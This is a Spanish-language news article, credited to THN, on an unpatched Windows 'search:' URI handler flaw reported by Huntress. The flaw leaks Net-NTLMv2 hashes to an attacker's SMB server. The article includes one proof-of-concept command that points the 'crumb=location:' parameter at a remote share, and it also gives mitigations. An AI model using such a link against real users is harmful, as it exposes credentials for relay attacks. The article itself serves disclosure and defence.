Investigadores de ciberseguridad han revelado detalles de una vulnerabilidad
sin parchear que podría explotarse para obtener el hash NTLMv2 de un usuario.
Como resultado, un atacante podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema, declarando que «solo los casos de gravedad Importante y Crítica cumplen con nuestros criterios para recibir soporte».
Al igual que en el caso de CVE-2026-33829, que afectaba al controlador de URI
`ms-screensketch:` de la herramienta Recortes de Windows, la nueva
vulnerabilidad detectada reside en el controlador de URI `search:`, según Huntress.
CVE-2026-33829 se refiere a una vulnerabilidad de suplantación de identidad
que podría exponer información confidencial a un atacante no autorizado.
«Un atacante podría inducir al usuario a hacer clic en un enlace
especialmente diseñado en un navegador web u otra URL, insertándolo en una
página web o un correo electrónico», señaló Microsoft en su aviso de seguridad en aquel momento.
Si el usuario aprueba la apertura del enlace, la URL manipulada puede inducir
al equipo a conectarse a un servidor SMB elegido por el atacante, lo que
revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para
autenticarse como tal.
En concreto, el problema radicaba en que el controlador de URI de la
Herramienta Recortes aceptaba un parámetro «filePath», no lo validaba y
accedía a cualquier ruta UNC (Convención de Nombres Universales) que se le
pasara. Esto, a su vez, podía activar la autenticación NTLM y exponer el hash
Net-NTLMv2 de la víctima al atacante.
La vulnerabilidad recientemente descubierta logra el mismo objetivo final
utilizando «search:» y «crumb=location:» en lugar de «filePath» con un comando
como el siguiente:
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
«Utilizaba el mismo mecanismo de fuga NTLM, producía la misma fuga
Net-NTLMv2, tenía los mismos requisitos previos y la misma calificación de
Moderada», afirmó Andrew Schwartz, investigador de Huntress. Cabe destacar que el uso
del parámetro «crumb» para robar el hash (CVE-2023-35636) fue documentado por
Varonis en febrero de 2024.
A falta de una solución, se recomienda bloquear el tráfico SMB saliente
(TCP/445 y TCP/139) en los hosts que no lo necesiten, exigir la firma SMB para
que los hashes capturados no puedan reenviarse a servicios internos y
deshabilitar NTLM donde corresponda.
Fuente:
THN